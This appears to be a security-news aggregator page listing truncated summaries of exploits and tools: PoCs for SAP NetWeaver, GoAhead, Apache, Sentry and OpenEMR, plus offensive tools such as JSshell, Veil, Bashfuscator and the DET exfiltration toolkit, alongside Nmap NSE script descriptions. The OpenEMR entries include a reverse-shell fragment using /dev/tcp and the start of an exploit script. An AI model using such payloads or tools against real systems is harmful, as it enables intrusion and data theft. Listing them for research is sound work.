Exploit for Unrestricted Upload of File with Dangerous Type in Sap Netweaver

CVE-2025-31324PoC Proof-of-Concept for CVE-2025-31324: Unauth...

Bashfuscator - A Fully Configurable And Extendable Bash Obfuscation Framework

Documentation What is Bashfuscator? Bashfuscator is a modular and extendable Bash obfuscation framework written in Python 3. It provides numerous different ways of making Bash one-liners or scripts much more difficult to understand. It accomplishes this by generating convoluted, randomized Bash...

Exploit for CVE-2017-17562

GoAhead Web Server 2.5 use multi/handler msf6 exploitmulti/h...

Exploit for Path Traversal in Apache Http_Server

Apachuk - CVE-2021-41773 Grabber with Shodan Grabber Apache Di...

Sentry 8.2.0 - Remote Code Execution (Authenticated) Exploit

Exploit Title: Sentry 8.2.0 - Remote Code Execution RCE Authenticated Exploit Author: Mohin Paramasivam Shad0wQu35t Vulnerability Discovered By : Clement Berthaux SYNACKTIV Software Link: https://sentry.io/welcome/ Advisory: https://doc.lagout.org/Others/synacktivadvisorysentrypickle.pdf Tested o...

Karton - Distributed Malware Processing Framework Based On Python, Redis And MinIO

Distributed malware processing framework based on Python, Redis and MinIO. The idea Karton is a robust framework for creating flexible and lightweight malware analysis backends. It can be used to connect malware analysis systems into a robust pipeline with very little effort. We've been in the...

JSshell - A JavaScript Reverse Shell For Exploiting XSS Remotely Or Finding Blind XSS, Working With Both Unix And Windows OS

JSshell - a JavaScript reverse shell. This using for exploit XSS remotely, help to find blind XSS, ... This tool works for both Unix and Windows operating system and it can running with both Python 2 and Python 3. This is a big update of JShell - a tool to get a JavaScript shell with XSS by...

Veil - Tool To Generate Metasploit Payloads That Bypass Common Anti-virus Solutions

Veil is a tool designed to generate metasploit payloads that bypass common anti-virus solutions. Veil is current under support by @ChrisTruncer Software Requirements: The following OSs are officially supported: Debian 8+ Kali Linux Rolling 2018.1+ The following OSs are likely able to run Veil: Ar...

OpenEMR < 5.0.1 - Remote Code Execution

Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example: http://127.0.0.1/openemr." ap.addargument"-u", "--user",...

OpenEMR 5.0.1 - (Authenticated) Remote Code Execution

OpenEMR 5.0.1 - Authenticated Remote Code Execution Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example:...

ip-geolocation-map-bing NSE Script

This script queries the Nmap registry for the GPS coordinates of targets stored by previous geolocation scripts and renders a Bing Map of markers representing the targets. The Bing Maps REST API has a limit of 100 markers, so if more coordinates are found, only the top 100 markers by number of IP...

tso-brute NSE Script

TSO account brute forcer. This script relies on the NSE TN3270 library which emulates a TN3270 screen for NMAP. TSO user IDs have the following rules: - it cannot begin with a number - only contains alpha-numeric characters and @, , $. - it cannot be longer than 7 chars Script Arguments...

coap-resources NSE Script

Dumps list of available resources from CoAP endpoints. This script establishes a connection to a CoAP endpoint and performs a GET request on a resource. The default resource for our request is code/.well-known/core/core, which should contain a list of resources provided by the endpoint. For...

DET - Data Exfiltration Toolkit

DET is provided AS IS, is a proof of concept to perform Data Exfiltration using either single or multiple channels at the same time. The idea was to create a generic toolkit to plug any kind of protocol/service. Slides DET has been presented at BSides Ljubljana on the 9th of March 2016 and the...

shodan-api NSE Script

Queries Shodan API for given targets and produces similar output to a -sV nmap scan. The ShodanAPI key can be set with the 'apikey' script argument, or hardcoded in the .nse file itself. You can get a free key from N.B if you want this script to run completely passively make sure to include the -...

rusers NSE Script

Connects to rusersd RPC service and retrieves a list of logged-in users. Script Arguments mount.version, nfs.version, rpc.protocol See the documentation for the rpc library. Example Usage nmap -sV --script=rusers Script Output | USER ON FROM SINCE IDLE | LOGIN console 2015-11-08T12:03:50 8h55m58s...

http-errors NSE Script

This script crawls through the website and returns any error pages. The script will return all pages sorted by error code that respond with an http code equal or above 400. To change this behaviour, please use the errcodes option. The script, by default, spiders and searches within forty pages. F...

http-phpself-xss NSE Script

Crawls a web server and attempts to find PHP files vulnerable to reflected cross site scripting via the variable $SERVER"PHPSELF". This script crawls the webserver to create a list of PHP files and then sends an attack vector/probe to identify PHPSELF cross site scripting vulnerabilities. PHPSELF...

ajp-headers NSE Script

Performs a HEAD or GET request against either the root directory or any optional directory of an Apache JServ Protocol server and returns the server response headers. Script Arguments ajp-headers.path The path to request, such as /index.php. Default /. slaxml.debug See the documentation for the...

hostmap-robtex NSE Script

Discovers hostnames that resolve to the target's IP address by querying the online Robtex service at . TEMPORARILY DISABLED due to changes in Robtex's API. See Script Arguments slaxml.debug See the documentation for the slaxml library. http.host, http.max-body-size, http.max-cache-size,...